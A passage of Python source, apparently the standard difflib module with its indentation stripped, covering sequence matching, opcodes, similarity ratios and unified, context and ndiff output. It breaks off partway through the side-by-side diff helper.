# Windiff ends up at the same place as diff, but by pairing up
# the unique 'b's and then matching the first two 'a's.
a, b, b2j, isbjunk = self.a, self.b, self.b2j, self.bjunk.__contains__
besti, bestj, bestsize = alo, blo, 0
# find longest junk-free match
# during an iteration of the loop, j2len[j] = length of longest
# junk-free match ending with a[i-1] and b[j]
j2len = {}
nothing = []
for i in range(alo, ahi):
# look at all instances of a[i] in b; note that because
# b2j has no junk keys, the loop is skipped if a[i] is junk
j2lenget = j2len.get
newj2len = {}
for j in b2j.get(a[i], nothing):
# a[i] matches b[j]
if j < blo:
continue
if j >= bhi:
break
k = newj2len[j] = j2lenget(j-1, 0) + 1
if k > bestsize:
besti, bestj, bestsize = i-k+1, j-k+1, k
j2len = newj2len
# Extend the best by non-junk elements on each end. In particular,
# "popular" non-junk elements aren't in b2j, which greatly speeds
# the inner loop above, but also means "the best" match so far
# doesn't contain any junk *or* popular non-junk elements.
while besti > alo and bestj > blo and \
not isbjunk(b[bestj-1]) and \
a[besti-1] == b[bestj-1]:
besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
while besti+bestsize < ahi and bestj+bestsize < bhi and \
not isbjunk(b[bestj+bestsize]) and \
a[besti+bestsize] == b[bestj+bestsize]:
bestsize += 1
# Now that we have a wholly interesting match (albeit possibly
# empty!), we may as well suck up the matching junk on each
# side of it too. Can't think of a good reason not to, and it
# saves post-processing the (possibly considerable) expense of
# figuring out what to do with it. In the case of an empty
# interesting match, this is clearly the right thing to do,
# because no other kind of match is possible in the regions.
while besti > alo and bestj > blo and \
isbjunk(b[bestj-1]) and \
a[besti-1] == b[bestj-1]:
besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
while besti+bestsize < ahi and bestj+bestsize < bhi and \
isbjunk(b[bestj+bestsize]) and \
a[besti+bestsize] == b[bestj+bestsize]:
bestsize = bestsize + 1
return Match(besti, bestj, bestsize)
def get_matching_blocks(self):
"""Return list of triples describing matching subsequences.
Each triple is of the form (i, j, n), and means that
a[i:i+n] == b[j:j+n]. The triples are monotonically increasing in
i and in j. New in Python 2.5, it's also guaranteed that if
(i, j, n) and (i', j', n') are adjacent triples in the list, and
the second is not the last triple in the list, then i+n != i' or
j+n != j'. IOW, adjacent triples never describe adjacent equal
blocks.
The last triple is a dummy, (len(a), len(b), 0), and is the only
triple with n==0.
>>> s = SequenceMatcher(None, "abxcd", "abcd")
>>> list(s.get_matching_blocks())
[Match(a=0, b=0, size=2), Match(a=3, b=2, size=2), Match(a=5, b=4, size=0)]
"""
if self.matching_blocks is not None:
return self.matching_blocks
la, lb = len(self.a), len(self.b)
# This is most naturally expressed as a recursive algorithm, but
# at least one user bumped into extreme use cases that exceeded
# the recursion limit on their box. So, now we maintain a list
# ('queue`) of blocks we still need to look at, and append partial
# results to `matching_blocks` in a loop; the matches are sorted
# at the end.
queue = [(0, la, 0, lb)]
matching_blocks = []
while queue:
alo, ahi, blo, bhi = queue.pop()
i, j, k = x = self.find_longest_match(alo, ahi, blo, bhi)
# a[alo:i] vs b[blo:j] unknown
# a[i:i+k] same as b[j:j+k]
# a[i+k:ahi] vs b[j+k:bhi] unknown
if k: # if k is 0, there was no matching block
matching_blocks.append(x)
if alo < i and blo < j:
queue.append((alo, i, blo, j))
if i+k < ahi and j+k < bhi:
queue.append((i+k, ahi, j+k, bhi))
matching_blocks.sort()
# It's possible that we have adjacent equal blocks in the
# matching_blocks list now. Starting with 2.5, this code was added
# to collapse them.
i1 = j1 = k1 = 0
non_adjacent = []
for i2, j2, k2 in matching_blocks:
# Is this block adjacent to i1, j1, k1?
if i1 + k1 == i2 and j1 + k1 == j2:
# Yes, so collapse them -- this just increases the length of
# the first block by the length of the second, and the first
# block so lengthened remains the block to compare against.
k1 += k2
else:
# Not adjacent. Remember the first block (k1==0 means it's
# the dummy we started with), and make the second block the
# new block to compare against.
if k1:
non_adjacent.append((i1, j1, k1))
i1, j1, k1 = i2, j2, k2
if k1:
non_adjacent.append((i1, j1, k1))
non_adjacent.append( (la, lb, 0) )
self.matching_blocks = non_adjacent
return map(Match._make, self.matching_blocks)
def get_opcodes(self):
"""Return list of 5-tuples describing how to turn a into b.
Each tuple is of the form (tag, i1, i2, j1, j2). The first tuple
has i1 == j1 == 0, and remaining tuples have i1 == the i2 from the
tuple preceding it, and likewise for j1 == the previous j2.
The tags are strings, with these meanings:
'replace': a[i1:i2] should be replaced by b[j1:j2]
'delete': a[i1:i2] should be deleted.
Note that j1==j2 in this case.
'insert': b[j1:j2] should be inserted at a[i1:i1].
Note that i1==i2 in this case.
'equal': a[i1:i2] == b[j1:j2]
>>> a = "qabxcd"
>>> b = "abycdf"
>>> s = SequenceMatcher(None, a, b)
>>> for tag, i1, i2, j1, j2 in s.get_opcodes():
... print(("%7s a[%d:%d] (%s) b[%d:%d] (%s)" %
... (tag, i1, i2, a[i1:i2], j1, j2, b[j1:j2])))
delete a[0:1] (q) b[0:0] ()
equal a[1:3] (ab) b[0:2] (ab)
replace a[3:4] (x) b[2:3] (y)
equal a[4:6] (cd) b[3:5] (cd)
insert a[6:6] () b[5:6] (f)
"""
if self.opcodes is not None:
return self.opcodes
i = j = 0
self.opcodes = answer = []
for ai, bj, size in self.get_matching_blocks():
# invariant: we've pumped out correct diffs to change
# a[:i] into b[:j], and the next matching block is
# a[ai:ai+size] == b[bj:bj+size]. So we need to pump
# out a diff to change a[i:ai] into b[j:bj], pump out
# the matching block, and move (i,j) beyond the match
tag = ''
if i < ai and j < bj:
tag = 'replace'
elif i < ai:
tag = 'delete'
elif j < bj:
tag = 'insert'
if tag:
answer.append( (tag, i, ai, j, bj) )
i, j = ai+size, bj+size
# the list of matching blocks is terminated by a
# sentinel with size 0
if size:
answer.append( ('equal', ai, i, bj, j) )
return answer
def get_grouped_opcodes(self, n=3):
""" Isolate change clusters by eliminating ranges with no changes.
Return a generator of groups with upto n lines of context.
Each group is in the same format as returned by get_opcodes().
>>> from pprint import pprint
>>> a = list(map(str, range(1,40)))
>>> b = a[:]
>>> b[8:8] = ['i'] # Make an insertion
>>> b[20] += 'x' # Make a replacement
>>> b[23:28] = [] # Make a deletion
>>> b[30] += 'y' # Make another replacement
>>> pprint(list(SequenceMatcher(None,a,b).get_grouped_opcodes()))
[[('equal', 5, 8, 5, 8), ('insert', 8, 8, 8, 9), ('equal', 8, 11, 9, 12)],
[('equal', 16, 19, 17, 20),
('replace', 19, 20, 20, 21),
('equal', 20, 22, 21, 23),
('delete', 22, 27, 23, 23),
('equal', 27, 30, 23, 26)],
[('equal', 31, 34, 27, 30),
('replace', 34, 35, 30, 31),
('equal', 35, 38, 31, 34)]]
"""
codes = self.get_opcodes()
if not codes:
codes = [("equal", 0, 1, 0, 1)]
# Fixup leading and trailing groups if they show no changes.
if codes[0][0] == 'equal':
tag, i1, i2, j1, j2 = codes[0]
codes[0] = tag, max(i1, i2-n), i2, max(j1, j2-n), j2
if codes[-1][0] == 'equal':
tag, i1, i2, j1, j2 = codes[-1]
codes[-1] = tag, i1, min(i2, i1+n), j1, min(j2, j1+n)
nn = n + n
group = []
for tag, i1, i2, j1, j2 in codes:
# End the current group and start a new one whenever
# there is a large range with no changes.
if tag == 'equal' and i2-i1 > nn:
group.append((tag, i1, min(i2, i1+n), j1, min(j2, j1+n)))
yield group
group = []
i1, j1 = max(i1, i2-n), max(j1, j2-n)
group.append((tag, i1, i2, j1 ,j2))
if group and not (len(group)==1 and group[0][0] == 'equal'):
yield group
def ratio(self):
"""Return a measure of the sequences' similarity (float in [0,1]).
Where T is the total number of elements in both sequences, and
M is the number of matches, this is 2.0*M / T.
Note that this is 1 if the sequences are identical, and 0 if
they have nothing in common.
.ratio() is expensive to compute if you haven't already computed
.get_matching_blocks() or .get_opcodes(), in which case you may
want to try .quick_ratio() or .real_quick_ratio() first to get an
upper bound.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.quick_ratio()
0.75
>>> s.real_quick_ratio()
1.0
"""
matches = sum(triple[-1] for triple in self.get_matching_blocks())
return _calculate_ratio(matches, len(self.a) + len(self.b))
def quick_ratio(self):
"""Return an upper bound on ratio() relatively quickly.
This isn't defined beyond that it is an upper bound on .ratio(), and
is faster to compute.
"""
# viewing a and b as multisets, set matches to the cardinality
# of their intersection; this counts the number of matches
# without regard to order, so is clearly an upper bound
if self.fullbcount is None:
self.fullbcount = fullbcount = {}
for elt in self.b:
fullbcount[elt] = fullbcount.get(elt, 0) + 1
fullbcount = self.fullbcount
# avail[x] is the number of times x appears in 'b' less the
# number of times we've seen it in 'a' so far ... kinda
avail = {}
availhas, matches = avail.__contains__, 0
for elt in self.a:
if availhas(elt):
numb = avail[elt]
else:
numb = fullbcount.get(elt, 0)
avail[elt] = numb - 1
if numb > 0:
matches = matches + 1
return _calculate_ratio(matches, len(self.a) + len(self.b))
def real_quick_ratio(self):
"""Return an upper bound on ratio() very quickly.
This isn't defined beyond that it is an upper bound on .ratio(), and
is faster to compute than either .ratio() or .quick_ratio().
"""
la, lb = len(self.a), len(self.b)
# can't have more matches than the number of elements in the
# shorter sequence
return _calculate_ratio(min(la, lb), la + lb)
def get_close_matches(word, possibilities, n=3, cutoff=0.6):
"""Use SequenceMatcher to return list of the best "good enough" matches.
word is a sequence for which close matches are desired (typically a
string).
possibilities is a list of sequences against which to match word
(typically a list of strings).
Optional arg n (default 3) is the maximum number of close matches to
return. n must be > 0.
Optional arg cutoff (default 0.6) is a float in [0, 1]. Possibilities
that don't score at least that similar to word are ignored.
The best (no more than n) matches among the possibilities are returned
in a list, sorted by similarity score, most similar first.
>>> get_close_matches("appel", ["ape", "apple", "peach", "puppy"])
['apple', 'ape']
>>> import keyword as _keyword
>>> get_close_matches("wheel", _keyword.kwlist)
['while']
>>> get_close_matches("Apple", _keyword.kwlist)
[]
>>> get_close_matches("accept", _keyword.kwlist)
['except']
"""
if not n > 0:
raise ValueError("n must be > 0: %r" % (n,))
if not 0.0 <= cutoff <= 1.0:
raise ValueError("cutoff must be in [0.0, 1.0]: %r" % (cutoff,))
result = []
s = SequenceMatcher()
s.set_seq2(word)
for x in possibilities:
s.set_seq1(x)
if s.real_quick_ratio() >= cutoff and \
s.quick_ratio() >= cutoff and \
s.ratio() >= cutoff:
result.append((s.ratio(), x))
# Move the best scorers to head of list
result = heapq.nlargest(n, result)
# Strip scores for the best n matches
return [x for score, x in result]
def _count_leading(line, ch):
"""
Return number of `ch` characters at the start of `line`.
Example:
>>> _count_leading(' abc', ' ')
3
"""
i, n = 0, len(line)
while i < n and line[i] == ch:
i += 1
return i
class Differ:
r"""
Differ is a class for comparing sequences of lines of text, and
producing human-readable differences or deltas. Differ uses
SequenceMatcher both to compare sequences of lines, and to compare
sequences of characters within similar (near-matching) lines.
Each line of a Differ delta begins with a two-letter code:
'- ' line unique to sequence 1
'+ ' line unique to sequence 2
' ' line common to both sequences
'? ' line not present in either input sequence
Lines beginning with '? ' attempt to guide the eye to intraline
differences, and were not present in either input sequence. These lines
can be confusing if the sequences contain tab characters.
Note that Differ makes no claim to produce a *minimal* diff. To the
contrary, minimal diffs are often counter-intuitive, because they synch
up anywhere possible, sometimes accidental matches 100 pages apart.
Restricting synch points to contiguous matches preserves some notion of
locality, at the occasional cost of producing a longer diff.
Example: Comparing two texts.
First we set up the texts, sequences of individual single-line strings
ending with newlines (such sequences can also be obtained from the
`readlines()` method of file-like objects):
>>> text1 = ''' 1. Beautiful is better than ugly.
... 2. Explicit is better than implicit.
... 3. Simple is better than complex.
... 4. Complex is better than complicated.
... '''.splitlines(1)
>>> len(text1)
4
>>> text1[0][-1]
'\n'
>>> text2 = ''' 1. Beautiful is better than ugly.
... 3. Simple is better than complex.
... 4. Complicated is better than complex.
... 5. Flat is better than nested.
... '''.splitlines(1)
Next we instantiate a Differ object:
>>> d = Differ()
Note that when instantiating a Differ object we may pass functions to
filter out line and character 'junk'. See Differ.__init__ for details.
Finally, we compare the two:
>>> result = list(d.compare(text1, text2))
'result' is a list of strings, so let's pretty-print it:
>>> from pprint import pprint as _pprint
>>> _pprint(result)
[' 1. Beautiful is better than ugly.\n',
'- 2. Explicit is better than implicit.\n',
'- 3. Simple is better than complex.\n',
'+ 3. Simple is better than complex.\n',
'? ++\n',
'- 4. Complex is better than complicated.\n',
'? ^ ---- ^\n',
'+ 4. Complicated is better than complex.\n',
'? ++++ ^ ^\n',
'+ 5. Flat is better than nested.\n']
As a single multi-line string it looks like this:
>>> print(''.join(result), end="")
1. Beautiful is better than ugly.
- 2. Explicit is better than implicit.
- 3. Simple is better than complex.
+ 3. Simple is better than complex.
? ++
- 4. Complex is better than complicated.
? ^ ---- ^
+ 4. Complicated is better than complex.
? ++++ ^ ^
+ 5. Flat is better than nested.
Methods:
__init__(linejunk=None, charjunk=None)
Construct a text differencer, with optional filters.
compare(a, b)
Compare two sequences of lines; generate the resulting delta.
"""
def __init__(self, linejunk=None, charjunk=None):
"""
Construct a text differencer, with optional filters.
The two optional keyword parameters are for filter functions:
- `linejunk`: A function that should accept a single string argument,
and return true iff the string is junk. The module-level function
`IS_LINE_JUNK` may be used to filter out lines without visible
characters, except for at most one splat ('#'). It is recommended
to leave linejunk None; as of Python 2.3, the underlying
SequenceMatcher class has grown an adaptive notion of "noise" lines
that's better than any static definition the author has ever been
able to craft.
- `charjunk`: A function that should accept a string of length 1. The
module-level function `IS_CHARACTER_JUNK` may be used to filter out
whitespace characters (a blank or tab; **note**: bad idea to include
newline in this!). Use of IS_CHARACTER_JUNK is recommended.
"""
self.linejunk = linejunk
self.charjunk = charjunk
def compare(self, a, b):
r"""
Compare two sequences of lines; generate the resulting delta.
Each sequence must contain individual single-line strings ending with
newlines. Such sequences can be obtained from the `readlines()` method
of file-like objects. The delta generated also consists of newline-
terminated strings, ready to be printed as-is via the writeline()
method of a file-like object.
Example:
>>> print(''.join(Differ().compare('one\ntwo\nthree\n'.splitlines(1),
... 'ore\ntree\nemu\n'.splitlines(1))),
... end="")
- one
? ^
+ ore
? ^
- two
- three
? -
+ tree
+ emu
"""
cruncher = SequenceMatcher(self.linejunk, a, b)
for tag, alo, ahi, blo, bhi in cruncher.get_opcodes():
if tag == 'replace':
g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
elif tag == 'delete':
g = self._dump('-', a, alo, ahi)
elif tag == 'insert':
g = self._dump('+', b, blo, bhi)
elif tag == 'equal':
g = self._dump(' ', a, alo, ahi)
else:
raise ValueError('unknown tag %r' % (tag,))
for line in g:
yield line
def _dump(self, tag, x, lo, hi):
"""Generate comparison results for a same-tagged range."""
for i in range(lo, hi):
yield '%s %s' % (tag, x[i])
def _plain_replace(self, a, alo, ahi, b, blo, bhi):
assert alo < ahi and blo < bhi
# dump the shorter block first -- reduces the burden on short-term
# memory if the blocks are of very different sizes
if bhi - blo < ahi - alo:
first = self._dump('+', b, blo, bhi)
second = self._dump('-', a, alo, ahi)
else:
first = self._dump('-', a, alo, ahi)
second = self._dump('+', b, blo, bhi)
for g in first, second:
for line in g:
yield line
def _fancy_replace(self, a, alo, ahi, b, blo, bhi):
r"""
When replacing one block of lines with another, search the blocks
for *similar* lines; the best-matching pair (if any) is used as a
synch point, and intraline difference marking is done on the
similar pair. Lots of work, but often worth it.
Example:
>>> d = Differ()
>>> results = d._fancy_replace(['abcDefghiJkl\n'], 0, 1,
... ['abcdefGhijkl\n'], 0, 1)
>>> print(''.join(results), end="")
- abcDefghiJkl
? ^ ^ ^
+ abcdefGhijkl
? ^ ^ ^
"""
# don't synch up unless the lines have a similarity score of at
# least cutoff; best_ratio tracks the best score seen so far
best_ratio, cutoff = 0.74, 0.75
cruncher = SequenceMatcher(self.charjunk)
eqi, eqj = None, None # 1st indices of equal lines (if any)
# search for the pair that matches best without being identical
# (identical lines must be junk lines, & we don't want to synch up
# on junk -- unless we have to)
for j in range(blo, bhi):
bj = b[j]
cruncher.set_seq2(bj)
for i in range(alo, ahi):
ai = a[i]
if ai == bj:
if eqi is None:
eqi, eqj = i, j
continue
cruncher.set_seq1(ai)
# computing similarity is expensive, so use the quick
# upper bounds first -- have seen this speed up messy
# compares by a factor of 3.
# note that ratio() is only expensive to compute the first
# time it's called on a sequence pair; the expensive part
# of the computation is cached by cruncher
if cruncher.real_quick_ratio() > best_ratio and \
cruncher.quick_ratio() > best_ratio and \
cruncher.ratio() > best_ratio:
best_ratio, best_i, best_j = cruncher.ratio(), i, j
if best_ratio < cutoff:
# no non-identical "pretty close" pair
if eqi is None:
# no identical pair either -- treat it as a straight replace
for line in self._plain_replace(a, alo, ahi, b, blo, bhi):
yield line
return
# no close pair, but an identical pair -- synch up on that
best_i, best_j, best_ratio = eqi, eqj, 1.0
else:
# there's a close pair, so forget the identical pair (if any)
eqi = None
# a[best_i] very similar to b[best_j]; eqi is None iff they're not
# identical
# pump out diffs from before the synch point
for line in self._fancy_helper(a, alo, best_i, b, blo, best_j):
yield line
# do intraline marking on the synch pair
aelt, belt = a[best_i], b[best_j]
if eqi is None:
# pump out a '-', '?', '+', '?' quad for the synched lines
atags = btags = ""
cruncher.set_seqs(aelt, belt)
for tag, ai1, ai2, bj1, bj2 in cruncher.get_opcodes():
la, lb = ai2 - ai1, bj2 - bj1
if tag == 'replace':
atags += '^' * la
btags += '^' * lb
elif tag == 'delete':
atags += '-' * la
elif tag == 'insert':
btags += '+' * lb
elif tag == 'equal':
atags += ' ' * la
btags += ' ' * lb
else:
raise ValueError('unknown tag %r' % (tag,))
for line in self._qformat(aelt, belt, atags, btags):
yield line
else:
# the synch pair is identical
yield ' ' + aelt
# pump out diffs from after the synch point
for line in self._fancy_helper(a, best_i+1, ahi, b, best_j+1, bhi):
yield line
def _fancy_helper(self, a, alo, ahi, b, blo, bhi):
g = []
if alo < ahi:
if blo < bhi:
g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
else:
g = self._dump('-', a, alo, ahi)
elif blo < bhi:
g = self._dump('+', b, blo, bhi)
for line in g:
yield line
def _qformat(self, aline, bline, atags, btags):
r"""
Format "?" output and deal with leading tabs.
Example:
>>> d = Differ()
>>> results = d._qformat('\tabcDefghiJkl\n', '\tabcdefGhijkl\n',
... ' ^ ^ ^ ', ' ^ ^ ^ ')
>>> for line in results: print(repr(line))
...
'- \tabcDefghiJkl\n'
'? \t ^ ^ ^\n'
'+ \tabcdefGhijkl\n'
'? \t ^ ^ ^\n'
"""
# Can hurt, but will probably help most of the time.
common = min(_count_leading(aline, "\t"),
_count_leading(bline, "\t"))
common = min(common, _count_leading(atags[:common], " "))
common = min(common, _count_leading(btags[:common], " "))
atags = atags[common:].rstrip()
btags = btags[common:].rstrip()
yield "- " + aline
if atags:
yield "? %s%s\n" % ("\t" * common, atags)
yield "+ " + bline
if btags:
yield "? %s%s\n" % ("\t" * common, btags)
# With respect to junk, an earlier version of ndiff simply refused to
# *start* a match with a junk element. The result was cases like this:
# before: private Thread currentThread;
# after: private volatile Thread currentThread;
# If you consider whitespace to be junk, the longest contiguous match
# not starting with junk is "e Thread currentThread". So ndiff reported
# that "e volatil" was inserted between the 't' and the 'e' in "private".
# While an accurate view, to people that's absurd. The current version
# looks for matching blocks that are entirely junk-free, then extends the
# longest one of those as far as possible but only with matching junk.
# So now "currentThread" is matched, then extended to suck up the
# preceding blank; then "private" is matched, and extended to suck up the
# following blank; then "Thread" is matched; and finally ndiff reports
# that "volatile " was inserted before "Thread". The only quibble
# remaining is that perhaps it was really the case that " volatile"
# was inserted after "private". I can live with that <wink>.
import re
def IS_LINE_JUNK(line, pat=re.compile(r"\s*#?\s*$").match):
r"""
Return 1 for ignorable line: iff `line` is blank or contains a single '#'.
Examples:
>>> IS_LINE_JUNK('\n')
True
>>> IS_LINE_JUNK(' # \n')
True
>>> IS_LINE_JUNK('hello\n')
False
"""
return pat(line) is not None
def IS_CHARACTER_JUNK(ch, ws=" \t"):
r"""
Return 1 for ignorable character: iff `ch` is a space or tab.
Examples:
>>> IS_CHARACTER_JUNK(' ')
True
>>> IS_CHARACTER_JUNK('\t')
True
>>> IS_CHARACTER_JUNK('\n')
False
>>> IS_CHARACTER_JUNK('x')
False
"""
return ch in ws
########################################################################
### Unified Diff
########################################################################
def _format_range_unified(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if length == 1:
return '{}'.format(beginning)
if not length:
beginning -= 1 # empty ranges begin at line just before the range
return '{},{}'.format(beginning, length)
def unified_diff(a, b, fromfile='', tofile='', fromfiledate='',
tofiledate='', n=3, lineterm='\n'):
r"""
Compare two sequences of lines; generate the delta as a unified diff.
Unified diffs are a compact way of showing line changes and a few
lines of context. The number of context lines is set by 'n' which
defaults to three.
By default, the diff control lines (those with ---, +++, or @@) are
created with a trailing newline. This is helpful so that inputs
created from file.readlines() result in diffs that are suitable for
file.writelines() since both the inputs and outputs have trailing
newlines.
For inputs that do not have trailing newlines, set the lineterm
argument to "" so that the output will be uniformly newline free.
The unidiff format normally has a header for filenames and modification
times. Any or all of these may be specified using strings for
'fromfile', 'tofile', 'fromfiledate', and 'tofiledate'.
The modification times are normally expressed in the ISO 8601 format.
Example:
>>> for line in unified_diff('one two three four'.split(),
... 'zero one tree four'.split(), 'Original', 'Current',
... '2005-01-26 23:30:50', '2010-04-02 10:20:52',
... lineterm=''):
... print(line) # doctest: +NORMALIZE_WHITESPACE
--- Original 2005-01-26 23:30:50
+++ Current 2010-04-02 10:20:52
@@ -1,4 +1,4 @@
+zero
one
-two
-three
+tree
four
"""
started = False
for group in SequenceMatcher(None,a,b).get_grouped_opcodes(n):
if not started:
started = True
fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
todate = '\t{}'.format(tofiledate) if tofiledate else ''
yield '--- {}{}{}'.format(fromfile, fromdate, lineterm)
yield '+++ {}{}{}'.format(tofile, todate, lineterm)
first, last = group[0], group[-1]
file1_range = _format_range_unified(first[1], last[2])
file2_range = _format_range_unified(first[3], last[4])
yield '@@ -{} +{} @@{}'.format(file1_range, file2_range, lineterm)
for tag, i1, i2, j1, j2 in group:
if tag == 'equal':
for line in a[i1:i2]:
yield ' ' + line
continue
if tag in {'replace', 'delete'}:
for line in a[i1:i2]:
yield '-' + line
if tag in {'replace', 'insert'}:
for line in b[j1:j2]:
yield '+' + line
########################################################################
### Context Diff
########################################################################
def _format_range_context(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if not length:
beginning -= 1 # empty ranges begin at line just before the range
if length <= 1:
return '{}'.format(beginning)
return '{},{}'.format(beginning, beginning + length - 1)
# See http://www.unix.org/single_unix_specification/
def context_diff(a, b, fromfile='', tofile='',
fromfiledate='', tofiledate='', n=3, lineterm='\n'):
r"""
Compare two sequences of lines; generate the delta as a context diff.
Context diffs are a compact way of showing line changes and a few
lines of context. The number of context lines is set by 'n' which
defaults to three.
By default, the diff control lines (those with *** or ---) are
created with a trailing newline. This is helpful so that inputs
created from file.readlines() result in diffs that are suitable for
file.writelines() since both the inputs and outputs have trailing
newlines.
For inputs that do not have trailing newlines, set the lineterm
argument to "" so that the output will be uniformly newline free.
The context diff format normally has a header for filenames and
modification times. Any or all of these may be specified using
strings for 'fromfile', 'tofile', 'fromfiledate', and 'tofiledate'.
The modification times are normally expressed in the ISO 8601 format.
If not specified, the strings default to blanks.
Example:
>>> print(''.join(context_diff('one\ntwo\nthree\nfour\n'.splitlines(1),
... 'zero\none\ntree\nfour\n'.splitlines(1), 'Original', 'Current')),
... end="")
*** Original
--- Current
***************
*** 1,4 ****
one
! two
! three
four
--- 1,4 ----
+ zero
one
! tree
four
"""
prefix = dict(insert='+ ', delete='- ', replace='! ', equal=' ')
started = False
for group in SequenceMatcher(None,a,b).get_grouped_opcodes(n):
if not started:
started = True
fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
todate = '\t{}'.format(tofiledate) if tofiledate else ''
yield '*** {}{}{}'.format(fromfile, fromdate, lineterm)
yield '--- {}{}{}'.format(tofile, todate, lineterm)
first, last = group[0], group[-1]
yield '***************' + lineterm
file1_range = _format_range_context(first[1], last[2])
yield '*** {} ****{}'.format(file1_range, lineterm)
if any(tag in {'replace', 'delete'} for tag, _, _, _, _ in group):
for tag, i1, i2, _, _ in group:
if tag != 'insert':
for line in a[i1:i2]:
yield prefix[tag] + line
file2_range = _format_range_context(first[3], last[4])
yield '--- {} ----{}'.format(file2_range, lineterm)
if any(tag in {'replace', 'insert'} for tag, _, _, _, _ in group):
for tag, _, _, j1, j2 in group:
if tag != 'delete':
for line in b[j1:j2]:
yield prefix[tag] + line
def ndiff(a, b, linejunk=None, charjunk=IS_CHARACTER_JUNK):
r"""
Compare `a` and `b` (lists of strings); return a `Differ`-style delta.
Optional keyword parameters `linejunk` and `charjunk` are for filter
functions (or None):
- linejunk: A function that should accept a single string argument, and
return true iff the string is junk. The default is None, and is
recommended; as of Python 2.3, an adaptive notion of "noise" lines is
used that does a good job on its own.
- charjunk: A function that should accept a string of length 1. The
default is module-level function IS_CHARACTER_JUNK, which filters out
whitespace characters (a blank or tab; note: bad idea to include newline
in this!).
Tools/scripts/ndiff.py is a command-line front-end to this function.
Example:
>>> diff = ndiff('one\ntwo\nthree\n'.splitlines(1),
... 'ore\ntree\nemu\n'.splitlines(1))
>>> print(''.join(diff), end="")
- one
? ^
+ ore
? ^
- two
- three
? -
+ tree
+ emu
"""
return Differ(linejunk, charjunk).compare(a, b)
def _mdiff(fromlines, tolines, context=None, linejunk=None,
charjunk=IS_CHARACTER_JUNK):
r"""Returns generator yielding marked up from/to side by side differences.
Arguments:
fromlines -- list of text lines to compared to tolines
tolines -- list of text lines to be compared to fromlines
context -- number of context lines to display on each side of difference,
if None, all from/to text lines will be generated.
linejunk -- passed on to ndiff (see ndiff documentation)
charjunk -- passed on to ndiff (see ndiff documentation)
This function returns an interator which returns a tuple:
(from line tuple, to line tuple, boolean flag)
from/to line tuple -- (line num, line text)
line num -- integer or None (to indicate a context separation)
line text -- original line text with following markers inserted:
'\0+' -- marks start of added text
'\0-' -- marks start of deleted text
'\0^' -- marks start of changed text
'\1' -- marks end of added/deleted/changed text
boolean flag -- None indicates context separation, True indicates
either "from" or "to" line contains a change, otherwise False.
This function/iterator was originally developed to generate side by side
file difference for making HTML pages (see HtmlDiff class for example
usage).
Note, this function utilizes the ndiff function to generate the side by
side difference markup. Optional ndiff arguments may be passed to this
function and they in turn will be passed to ndiff.
"""
import re
# regular expression for finding intraline change indices
change_re = re.compile('(\++|\-+|\^+)')
# create the difference iterator to generate the differences
diff_lines_iterator = ndiff(fromlines,tolines,linejunk,charjunk)
def _make_line(lines, format_key, side, num_lines=[0,0]):
"""Returns line of text with user's change markup and line formatting.
lines -- list of lines from the ndiff generator to produce a line of
text from. When producing the line of text to return, the
lines used are removed from this list.
format_key -- '+' return first line in list with "add" markup around
the entire line.
'-' return first line in list with "delete" markup around
the entire line.
'?' return first line in list with add/delete/change
intraline markup (indices obtained from second line)
None return first line in list with no markup
side -- indice into the num_lines list (0=from,1=to)
num_lines -- from/to current line number. This is NOT intended to be a
passed parameter. It is present as a keyword argument to
maintain memory of the current line numbers between calls
of this function.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
num_lines[side] += 1
# Handle case where no user markup is to be added, just return line of
# text with user's line format to allow for usage of the line number.
if format_key is None:
return (num_lines[side],lines.pop(0)[2:])
# Handle case of intraline changes
if format_key == '?':
text, markers = lines.pop(0), lines.pop(0)
# find intraline changes (store change type and indices in tuples)
sub_info = []
def record_sub_info(match_object,sub_info=sub_info):
sub_info.append([match_object.group(1)[0],match_object.span()])
return match_object.group(1)
change_re.sub(record_sub_info,markers)
# process each tuple inserting our special marks that won't be
# noticed by an xml/html escaper.
for key,(begin,end) in sub_info[::-1]:
text = text[0:begin]+'\0'+key+text[begin:end]+'\1'+text[end:]
text = text[2:]
# Handle case of add/delete entire line
else:
text = lines.pop(0)[2:]
# if line of text is just a newline, insert a space so there is
# something for the user to highlight and see.
if not text:
text = ' '
# insert marks that won't be noticed by an xml/html escaper.
text = '\0' + format_key + text + '\1'
# Return line of text, first allow user's line formatter to do its
# thing (such as adding the line number) then replace the special
# marks with what the user's change markup.
return (num_lines[side],text)
def _line_iterator():
"""Yields from/to lines of text with a change indication.
This function is an iterator. It itself pulls lines from a
differencing iterator, processes them and yields them. When it can
it yields both a "from" and a "to" line, otherwise it will yield one
or the other. In addition to yielding the lines of from/to text, a
boolean flag is yielded to indicate if the text line(s) have
differences in them.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
lines = []
num_blanks_pending, num_blanks_to_yield = 0, 0
while True:
# Load up next 4 lines so we can look ahead, create strings which
# are a concatenation of the first character of each of the 4 lines
# so we can do some very readable comparisons.
while len(lines) < 4:
try:
lines.append(next(diff_lines_iterator))
except StopIteration:
lines.append('X')
s = ''.join([line[0] for line in lines])
if s.startswith('X'):
# When no more lines, pump out any remaining blank lines so the
# corresponding add/delete lines get a matching blank line so
# all line pairs get yielded at the next level.
num_blanks_to_yield = num_blanks_pending
elif s.startswith('-?+?'):
# simple intraline change
yield _make_line(lines,'?',0), _make_line(lines,'?',1), True
continue
elif s.startswith('--++'):
# in delete block, add block coming: we do NOT want to get
# caught up on blank lines yet, just process the delete line
num_blanks_pending -= 1
yield _make_line(lines,'-',0), None, True
continue
elif s.startswith(('--?+', '--+', '- ')):
# in delete block and see a intraline change or unchanged line
# coming: yield the delete line and then blanks
from_line,to_line = _make_line(lines,'-',0), None
num_blanks_to_yield,num_blanks_pending = num_blanks_pending-1,0
elif s.startswith('-+?'):
